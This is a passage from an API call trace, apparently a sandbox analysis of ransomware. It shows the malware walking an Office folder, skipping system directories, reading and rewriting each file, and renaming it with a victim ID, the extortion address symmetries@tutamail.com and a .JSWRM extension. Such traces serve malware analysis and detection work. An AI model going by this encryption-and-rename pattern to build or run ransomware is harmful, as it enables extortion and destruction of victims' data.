[0113.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0113.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0113.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0113.699] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DataServices\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1697068, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x99937c0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x3a6f141c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName=".", cAlternateFileName="")) returned 0x232240 [0113.699] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0113.699] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1697068, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x99937c0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x3a6f141c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="..", cAlternateFileName="")) returned 1 [0113.699] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0113.699] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0113.699] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x996d62b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x996d62b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x99dfc61, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="+Connect to New Data Source.odc", cAlternateFileName="_CONNE~1.ODC")) returned 1 [0113.699] lstrcmpiW (lpString1="+Connect to New Data Source.odc", lpString2=".") returned 1 [0113.699] lstrcmpiW (lpString1="+Connect to New Data Source.odc", lpString2="..") returned 1 [0113.699] lstrcmpiW (lpString1="+Connect to New Data Source.odc", lpString2="...") returned 1 [0113.699] lstrcmpiW (lpString1="+Connect to New Data Source.odc", lpString2="windows") returned -1 [0113.699] lstrcmpiW (lpString1="+Connect to New Data Source.odc", lpString2="recovery") returned -1 [0113.699] lstrcmpiW (lpString1="+Connect to New Data Source.odc", lpString2="perflogs") returned -1 [0113.700] lstrcmpiW (lpString1="+Connect to New Data Source.odc", lpString2="documents and settings") returned -1 [0113.700] lstrcmpiW (lpString1="+Connect to New Data Source.odc", lpString2="$RECYCLE.BIN") returned 1 [0113.700] lstrcmpiW (lpString1="+Connect to New Data Source.odc", lpString2="system volume information") returned -1 [0113.700] lstrcmpiW (lpString1="+Connect to New Data Source.odc", lpString2="msocache") returned -1 [0113.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0113.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="+Connect to New Data Source.odc", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0113.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0113.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="+Connect to New Data Source.odc", cchWideChar=31, lpMultiByteStr=0x241268, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="+Connect to New Data Source.odc", lpUsedDefaultChar=0x0) returned 31 [0113.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0113.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0113.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="+Connect to New Data Source.odc", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0113.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0113.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="+Connect to New Data Source.odc", cchWideChar=31, lpMultiByteStr=0x241330, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="+Connect to New Data Source.odc", lpUsedDefaultChar=0x0) returned 31 [0113.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0113.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0113.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0113.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0113.700] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DataServices\\+Connect to New Data Source.odc" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\dataservices\\+connect to new data source.odc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0113.701] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=190) returned 1 [0113.701] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0113.701] ReadFile (in: hFile=0x314, lpBuffer=0x236690, nNumberOfBytesToRead=0xb0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x236690*, lpNumberOfBytesRead=0x345e534*=0xb0, lpOverlapped=0x0) returned 1 [0113.702] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.702] WriteFile (in: hFile=0x314, lpBuffer=0x236690*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x236690*, lpNumberOfBytesWritten=0x345e530*=0xb0, lpOverlapped=0x0) returned 1 [0113.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0113.702] CloseHandle (hObject=0x314) returned 1 [0113.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0113.702] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.702] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0113.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.702] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0113.702] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0113.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dd70 [0113.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0113.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dd70 | out: hHeap=0x1e0000) returned 1 [0113.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0113.703] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DataServices\\+Connect to New Data Source.odc" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\dataservices\\+connect to new data source.odc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DataServices\\+Connect to New Data Source.odc.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\dataservices\\+connect to new data source.odc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.703] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0113.703] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0113.703] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0113.703] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0113.703] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0113.704] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x996d62b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x996d62b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x99b9a24, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc4, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="+NewSQLServerConnection.odc", cAlternateFileName="_NEWSQ~1.ODC")) returned 1 [0113.704] lstrcmpiW (lpString1="+NewSQLServerConnection.odc", lpString2=".") returned 1 [0113.704] lstrcmpiW (lpString1="+NewSQLServerConnection.odc", lpString2="..") returned 1 [0113.704] lstrcmpiW (lpString1="+NewSQLServerConnection.odc", lpString2="...") returned 1 [0113.704] lstrcmpiW (lpString1="+NewSQLServerConnection.odc", lpString2="windows") returned -1 [0113.704] lstrcmpiW (lpString1="+NewSQLServerConnection.odc", lpString2="recovery") returned -1 [0113.704] lstrcmpiW (lpString1="+NewSQLServerConnection.odc", lpString2="perflogs") returned -1 [0113.704] lstrcmpiW (lpString1="+NewSQLServerConnection.odc", lpString2="documents and settings") returned -1 [0113.704] lstrcmpiW (lpString1="+NewSQLServerConnection.odc", lpString2="$RECYCLE.BIN") returned 1 [0113.704] lstrcmpiW (lpString1="+NewSQLServerConnection.odc", lpString2="system volume information") returned -1 [0113.704] lstrcmpiW (lpString1="+NewSQLServerConnection.odc", lpString2="msocache") returned -1 [0113.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0113.704] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="+NewSQLServerConnection.odc", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0113.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0113.704] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="+NewSQLServerConnection.odc", cchWideChar=27, lpMultiByteStr=0x240f70, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="+NewSQLServerConnection.odc", lpUsedDefaultChar=0x0) returned 27 [0113.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0113.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0113.704] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="+NewSQLServerConnection.odc", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0113.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0113.704] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="+NewSQLServerConnection.odc", cchWideChar=27, lpMultiByteStr=0x2413a8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="+NewSQLServerConnection.odc", lpUsedDefaultChar=0x0) returned 27 [0113.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0113.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0113.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0113.704] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.704] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c000 [0113.704] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DataServices\\+NewSQLServerConnection.odc" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\dataservices\\+newsqlserverconnection.odc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0113.705] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=196) returned 1 [0113.705] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b5d8 [0113.705] ReadFile (in: hFile=0x314, lpBuffer=0x24b5d8, nNumberOfBytesToRead=0xc0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24b5d8*, lpNumberOfBytesRead=0x345e534*=0xc0, lpOverlapped=0x0) returned 1 [0113.706] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.706] WriteFile (in: hFile=0x314, lpBuffer=0x24b5d8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24b5d8*, lpNumberOfBytesWritten=0x345e530*=0xc0, lpOverlapped=0x0) returned 1 [0113.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b5d8 | out: hHeap=0x1e0000) returned 1 [0113.706] CloseHandle (hObject=0x314) returned 1 [0113.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0113.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0113.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0113.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0113.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22df20 [0113.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0113.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22df20 | out: hHeap=0x1e0000) returned 1 [0113.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0113.707] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DataServices\\+NewSQLServerConnection.odc" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\dataservices\\+newsqlserverconnection.odc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DataServices\\+NewSQLServerConnection.odc.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\dataservices\\+newsqlserverconnection.odc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0113.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0113.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c000 | out: hHeap=0x1e0000) returned 1 [0113.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0113.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0113.707] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x996d62b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x996d62b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x996d62b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x46, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="DESKTOP.INI", cAlternateFileName="")) returned 1 [0113.708] lstrcmpiW (lpString1="DESKTOP.INI", lpString2=".") returned 1 [0113.708] lstrcmpiW (lpString1="DESKTOP.INI", lpString2="..") returned 1 [0113.708] lstrcmpiW (lpString1="DESKTOP.INI", lpString2="...") returned 1 [0113.708] lstrcmpiW (lpString1="DESKTOP.INI", lpString2="windows") returned -1 [0113.708] lstrcmpiW (lpString1="DESKTOP.INI", lpString2="recovery") returned -1 [0113.708] lstrcmpiW (lpString1="DESKTOP.INI", lpString2="perflogs") returned -1 [0113.708] lstrcmpiW (lpString1="DESKTOP.INI", lpString2="documents and settings") returned -1 [0113.708] lstrcmpiW (lpString1="DESKTOP.INI", lpString2="$RECYCLE.BIN") returned 1 [0113.708] lstrcmpiW (lpString1="DESKTOP.INI", lpString2="system volume information") returned -1 [0113.708] lstrcmpiW (lpString1="DESKTOP.INI", lpString2="msocache") returned -1 [0113.708] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0113.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DESKTOP.INI", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0113.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DESKTOP.INI", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DESKTOP.INI", lpUsedDefaultChar=0x0) returned 11 [0113.708] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0113.708] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0113.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DESKTOP.INI", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0113.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DESKTOP.INI", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DESKTOP.INI", lpUsedDefaultChar=0x0) returned 11 [0113.708] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0113.708] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0113.708] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0113.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.708] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0113.708] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DataServices\\DESKTOP.INI" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\dataservices\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0113.709] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=70) returned 1 [0113.709] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0113.709] ReadFile (in: hFile=0x314, lpBuffer=0x20dba8, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20dba8*, lpNumberOfBytesRead=0x345e534*=0x40, lpOverlapped=0x0) returned 1 [0113.710] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.710] WriteFile (in: hFile=0x314, lpBuffer=0x20dba8*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20dba8*, lpNumberOfBytesWritten=0x345e530*=0x40, lpOverlapped=0x0) returned 1 [0113.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0113.710] CloseHandle (hObject=0x314) returned 1 [0113.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0113.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0113.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0113.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0113.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0113.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0113.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0113.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0113.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.710] MoveFileW 